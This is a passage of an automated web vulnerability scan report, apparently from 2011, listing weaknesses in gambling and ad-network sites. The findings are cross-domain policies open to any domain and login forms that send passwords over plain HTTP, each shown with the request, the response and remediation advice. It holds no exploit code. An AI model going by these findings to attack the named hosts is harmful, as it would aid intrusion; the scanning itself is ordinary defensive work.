<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-
...[SNIP]...
<allow-access-from domain="cdn.betsson.com"/>
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.139. http://members.bet365.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://members.bet365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: members.bet365.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 16 May 2011 11:41:02 GMT
X-Powered-By: ASP.NET
Content-Length: 469
Content-Type: text/html
Cache-control: private

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFileHttps.xsd
...[SNIP]...
<allow-access-from domain="www.bet365.com" to-ports="443,80" secure="false" />
...[SNIP]...

4.140. https://members.bet365.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://members.bet365.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: members.bet365.com

Response

HTTP/1.1 200 OK
Connection: keep-alive
Date: Mon, 16 May 2011 12:34:11 GMT
X-Powered-By: ASP.NET
Content-Length: 469
Content-Type: text/html
Cache-control: private

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFileHttps.xsd
...[SNIP]...
<allow-access-from domain="www.bet365.com" to-ports="443,80" secure="false" />
...[SNIP]...

4.141. https://poker.betsson.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://poker.betsson.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: poker.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 03:46:34 GMT
Last-Modified: Wed, 16 Feb 2011 11:20:42 GMT
Accept-Ranges: bytes
ETag: "1CBCDCB8BEFE100"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:28 GMT
Connection: close
Content-Length: 548

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="cdn.betsson.com"/>
<allow-access-from domain="betsson.hs.llnwd.net"/>
<allow-access-from domain="s-cdn.betsson.com"/>
<allow-access-from domain="t-cdn.betsson.com"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.142. https://scratch.betsson.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: scratch.betsson.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 04:03:14 GMT
Last-Modified: Mon, 14 Feb 2011 10:54:04 GMT
Accept-Ranges: bytes
ETag: "1CBCC357EA0EE00"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:45:03 GMT
Connection: close
Content-Length: 343

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="ble-cdn.betsson.com"/>
...[SNIP]...

4.143. http://twitter.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
Set-Cookie: k=173.193.214.243.1305547124759243; path=/; expires=Mon, 23-May-11 11:58:44 GMT; domain=.twitter.com
Last-Modified: Wed, 04 May 2011 17:32:26 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Mon, 16 May 2011 12:28:44 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
<allow-access-from domain="search.twitter.com" />
<allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.144. https://www.norskelodd.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.norskelodd.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.norskelodd.com

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/xml
Expires: Tue, 17 May 2011 08:39:44 GMT
Last-Modified: Tue, 23 Nov 2010 15:48:12 GMT
Accept-Ranges: bytes
ETag: "1CB8B25D55EC600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 11:43:14 GMT
Connection: close
Content-Length: 394

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="ws-cdn.ble.local"/>
<allow-access-from domain="ble.hs.llnwd.net"/>
<allow-access-from domain="www.norgesloddet.com"/>
...[SNIP]...

5. Silverlight cross-domain policy previous next
There are 6 instances of this issue:

http://ad-emea.doubleclick.net/clientaccesspolicy.xml
http://ad.doubleclick.net/clientaccesspolicy.xml
http://b.scorecardresearch.com/clientaccesspolicy.xml
http://s0.2mdn.net/clientaccesspolicy.xml
http://secure-us.imrworldwide.com/clientaccesspolicy.xml
http://spe.atdmt.com/clientaccesspolicy.xml

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ad-emea.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad-emea.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Mon, 14 Apr 2008 15:50:56 GMT
Date: Mon, 16 May 2011 11:41:05 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ad.doubleclick.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 19:54:04 GMT
Date: Mon, 16 May 2011 12:49:31 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 17 May 2011 12:49:29 GMT
Date: Mon, 16 May 2011 12:49:29 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.4. http://s0.2mdn.net/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s0.2mdn.net
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 15 May 2011 12:20:21 GMT
Expires: Sun, 15 May 2011 12:12:17 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 86106
Cache-Control: public, max-age=86400

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.5. http://secure-us.imrworldwide.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:49:30 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Mon, 23 May 2011 12:49:30 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

5.6. http://spe.atdmt.com/clientaccesspolicy.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://spe.atdmt.com
Path:	/clientaccesspolicy.xml

Issue detail

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 312
Allow: GET
Expires: Sat, 21 May 2011 05:45:10 GMT
Date: Mon, 16 May 2011 12:52:12 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

6. Cleartext submission of password previous next
There are 20 instances of this issue:

http://affiliates.interwetten.com/
http://bingo.bet365.com/play/en/home/
http://casino.bet365.com/extra/en/online-games/baccarat
http://casino.bet365.com/extra/en/online-games/blackjack
http://casino.bet365.com/extra/en/online-games/live-dealer
http://casino.bet365.com/extra/en/online-games/roulette
http://casino.bet365.com/home/en/
http://games.bet365.com/home/en/
http://poker.bet365.com/home/en/
http://www.bet365.com/extra/en/betting/in-play
http://www.bet365.com/extra/en/betting/live-streaming
http://www.bet365.com/extra/en/mobile/introduction/
http://www.bet365.com/extra/en/promotions/horse-racing/best-odds-guaranteed
http://www.bet365.com/extra/en/promotions/soccer/bore-draw-money-back
http://www.bet365.com/extra/en/promotions/soccer/soccer-accumulator-bonus
http://www.crazyrewards.com/
http://www.facebook.com/
http://www.heavenaffiliates.com/
http://www.postcodelottery.com/MyAccount.htm
http://www.tstglobal.com/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

6.1. http://affiliates.interwetten.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://affiliates.interwetten.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://affiliates.interwetten.com/Default.aspx

The form contains the following password field:

ctl00$txtPassword

Request

GET / HTTP/1.1
Host: affiliates.interwetten.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:20:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=4rvtrm45hxdjs5axh0krts45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10237
Set-Cookie: BIGipServerPool_affiliates.interwetten.com=1727730092.20480.0000; path=/
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta ht
...[SNIP]...
<body>
<form name="aspnetForm" method="post" action="Default.aspx" id="aspnetForm">
<div>
...[SNIP]...
</label>
<input name="ctl00$txtPassword" type="password" id="ctl00_txtPassword" class="field" style="width:169px;" />

<input type="submit" name="ctl00$Button1" value="Login" id="ctl00_Button1" class="button1" />
...[SNIP]...

6.2. http://bingo.bet365.com/play/en/home/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bingo.bet365.com
Path:	/play/en/home/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://bingo.bet365.com/play/en/home/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /play/en/home/ HTTP/1.1
Host: bingo.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:35:26 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=uhx0t5ntbzbisd55vri2jy55; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: session=stk=FE57C4F4DDFF44EDB9007B44EEA8BA12000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:35:26 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:35:26 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 130943

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Bingo at bet36
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/play/en/home/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" />

<a onclick="if (CreateLoginProcess('', '%2fplay%2fen%2fhome%2f', '', false, this.id)) { SetHiddenPassword("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword"); return true
...[SNIP]...

6.3. http://casino.bet365.com/extra/en/online-games/baccarat previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/baccarat

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://casino.bet365.com/extra/en/online-games/baccarat/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/baccarat HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cbmjzc45ptk3gqmomxrqk1mx; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: session=stk=738A9FB42BA343DABCD3136AA3621ACE000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 88186

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/baccarat/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.4. http://casino.bet365.com/extra/en/online-games/blackjack previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/blackjack

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://casino.bet365.com/extra/en/online-games/blackjack/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/blackjack HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=oltt0c55lt0sebb3qyxf2u45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: session=stk=A71662CB8A884A4A9D4A3B4BA20AEE87000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:23 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 86154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/blackjack/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.5. http://casino.bet365.com/extra/en/online-games/live-dealer previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/live-dealer

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://casino.bet365.com/extra/en/online-games/live-dealer/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/live-dealer HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:25 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bwkilnzzw312lbao5zygnc3u; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: session=stk=AE7AAAF18ED44B4CA0DFD512563D0E3F000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:25 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:25 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 93559

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/live-dealer/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.6. http://casino.bet365.com/extra/en/online-games/roulette previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/extra/en/online-games/roulette

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://casino.bet365.com/extra/en/online-games/roulette/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /extra/en/online-games/roulette HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:24 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kcnaqt55ip33v1nmqm3ozt45; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: session=stk=08ACA4CA6B6B4BC394152B73FAC0A82C000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:24 GMT; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 85710

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_Html" xmlns="http://www.w3.org/1999/xhtml">
<head id="
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/extra/en/online-games/roulette/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
ssword", 2);" OnFocus="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 2);" /><input name="ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword" type="password" id="ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword" tabindex="3" class="textbox" OnBlur="PasswordBehaviour("ctl00_HeaderPlaceHolder_HeaderControl_Login_ProtectedPassword", "ctl00_HeaderPlaceHolder_HeaderControl_Login_InitialPassword", 1);" /></div>
...[SNIP]...

6.7. http://casino.bet365.com/home/en/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://casino.bet365.com
Path:	/home/en/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://casino.bet365.com/home/en/Default.aspx

The form contains the following password field:

ctl00$HeaderPlaceHolder$HeaderControl$Login$ProtectedPassword

Request

GET /home/en/ HTTP/1.1
Host: casino.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:32:23 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=5xuac3551kzj4cm3dpese255; path=/; HttpOnly
Set-Cookie: bet365_Session=; path=/
Set-Cookie: stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: session=stk=840278C39B9946C182A492B2D9FF91B8000002; path=/
Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: country=198; expires=Tue, 15-May-2012 12:32:22 GMT; path=/
Set-Cookie: LandingVisited=True; path=/
Cache-Control: private
Expires: Sat, 14 May 2011 12:32:23 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 227712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_Head1"><t
...[SNIP]...
<div id="pageContainer" style="float:none;">
<form name="aspnetForm" method="post" action="/home/en/Default.aspx" onkeypress="javascript:return WebForm_FireDefaultButton(event, 'ctl00_HeaderPlaceHolder_HeaderControl_Login_Go')" id="aspnetForm">
<div>
...[SNIP]...
